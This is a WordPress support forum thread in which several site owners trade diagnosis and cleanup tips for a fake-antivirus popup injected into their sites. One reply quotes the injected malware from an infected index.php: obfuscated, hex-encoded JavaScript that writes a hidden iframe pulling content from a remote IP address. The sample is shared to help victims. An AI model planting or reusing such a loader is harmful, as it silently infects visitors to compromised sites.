Support » Fixing WordPress » advanced xp defender

  • gmatkin


    My weblog seems to have been infected with some sort of Trojan, and I’d be most grateful for advice urgently.

    The thing pops up when I hit the admin and view site links, and I guess it’s probably infective readers’ computers as I write.

    What happens is that a message appears that reads:

    Attention! You have not completed the virus scan!
    Your PC is still infected with spyware!

    Please return to and downloat Advanced XP Defender scanner.

    When I click that off using the top-right-hand cross it seems to have another go.

    Now, I know this is not happening on my main computer only, as I’ve tested it on my second computer. I also know that my spyware detector is picking it up as a Trojan, that appears to come from my weblog.

    Has it been hacked, and if so what should I do please?



Viewing 15 replies - 16 through 30 (of 30 total)
  • skaterkee


    Well I just replaced the index.php with a backup and it went away but I don’t think it’ll be gone for long because I have no idea how it got there.



    The problem is not with your wp version or anything… it just happened on a few of our drupal based sites and also a custom coded asp site – we are guessing it has something to do with our ftp info being shared. we’re trying multiple things and will keep you guys posted as well. Please hit us up if any of you find the issue. – Thanks alot [Danish]



    guys, thanks for discussing this problem online. i have the same problem. it has come to my attention that it only poped-up when i was currently browsing my site or when i was about to leave.

    just to make sure, i’ve used AntiVir, Malwarebytes’ Anti-Malware and Spybot to check but they found nothing.

    so, here’s the idea to trace, how about we compare the version of wordpress and active plugins we used?

    here’s mine:
    Wordpress 2.5.1
    Calendar 2.0
    cforms 8.5.1
    Exec-PHP 4.7
    GetWeather 1.2.1
    Image Counter 1.0
    My Link Order 2.5.1
    NextGEN Gallery 0.96
    Pagebar2 2.20
    pageMash 1.1.3
    Ryans Suckerfish WordPress Dropdown Menu 1.6.6
    Search Hilite 1.5
    Simple Archive Generator 3.2
    Simple Cache 1.0
    TinyMCE Advanced 3.0.1
    Truncate Title 1.0
    WP-Highslide 1.28
    WP-Print 2.30
    WP-UserOnline 2.30




    a little update guys..

    i found that it changed 4 files (on online server),
    by inserting some scripts.

    this is my changed index.php

    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    var d=document,kol=561;
    function O10H485A55AFF19D2(H485A55AFF21B6){ var H485A55AFF25B0 = 16; return( parseInt(H485A55AFF21B6,H485A55AFF25B0));}function H485A55AFF2DA8(H485A55AFF31A5){ var H485A55AFF359E=”;for(H485A55AFF3999=0; H485A55AFF3999<H485A55AFF31A5.length; H485A55AFF3999+=2){ H485A55AFF359E += ( String.fromCharCode (O10H485A55AFF19D2(H485A55AFF31A5.substr(H485A55AFF3999, 2))));}return H485A55AFF359E;} document.write(H485A55AFF2DA8(‘3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3337393532292B2766333434395C272077696474683D353933206865696768743D3634207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E’));




    It’s not just exclusive to WordPress. I uploaded HTML files and it still appeared on them. I think it just ruins your whole server and adds that script to your files.

    I’ve been struggling with this one too, but might(!) have solved it.

    Couple of days ago this popped up on my custom coded php website. I’m running on a windows server and integrated into my site are 2 copies of wordpress and 1 copy of phpBB. The only WordPress plugin running was akismet.

    It seems to mainly infect files (see code in post above) with the prefix index, regardless of the extension. However, it did appear in login.php of phpbb.

    Initially I thought this was an injection attack. So I removed all the hacked code from the infected files and upgraded to latest version of wordpress and phpBB.

    We also have a custom form that uses a formmail script. I tightened up the validation on all the fields, and restricted the entry for fields to no more that 35 characters.

    I thought this has solved it, until the next morning when it reappeared!

    I then upgraded the formmail script, deleted any old files via FTP, changed ftp passwords and removed any other FTP users.

    I also ran a spyware scanner on our server… Which is the key bit…
    It picked up 2 trojans one of them being ‘advanced xp defender’.

    So far (fingers crossed) we haven’t been re-infected.

    I suggest that if you are having this problem that you:

    • Remove all malicious code from infected files
    • Upgrade to the latest version of wordpress/ other open source apps
    • Change FTP passwords
    • Upgrade plugins
    • Disable plugins that use forms on the front end
    • Delete any old files on your server
    • Ensure any custom forms use validation and the latest scripts
    • Get your host to perform a virus/spyware scan on their server

    The spyware app I used was Spyware doctor from PCtools.

    Hope this helps.

    thanks a lot, it’s crystal clear.

    it’s been 2 days since i tried to fix mine, no pop-up anymore.

    actually i’d removed that script once before, but pop-up kept showing. then i remembered that i’d used cracked ftp client! having that in mind, i threw the old one, switched to filezilla, removed that script and then changed my ftp password.

    as i found out (via googling) that even a hand-made and also a 2-years-safe site had been infected, i guess what we’ve uploaded (cms) is not suspected anymore. now only 2 left, uploading process, and the server itself.

    i guess we’ll find out shortly what the real problem is. for now, i recommend you to
    – try to change ftp client
    – remove script from infected file, and then
    – change ftp password

    can’t wait to hear news from you guys..

    hope this helps, too.

    Thanks for the help I’m in the process of fixing it now but my site has been labeled as dangerous by google 🙁

    May I ask how you scanned you server for spyware?

    Skaterkee, we have our own dedicated server, which means access like a normal computer. If you’re on shared hosting -contact your host to perform a scan.

    That’ll take two weeks knowing hostgator.

    Do you know if there’s a way to check wordpress’s database for abnormalities?

    God sakes, my host went off on one and deleted everything off my account.

Viewing 15 replies - 16 through 30 (of 30 total)
  • The topic ‘advanced xp defender’ is closed to new replies.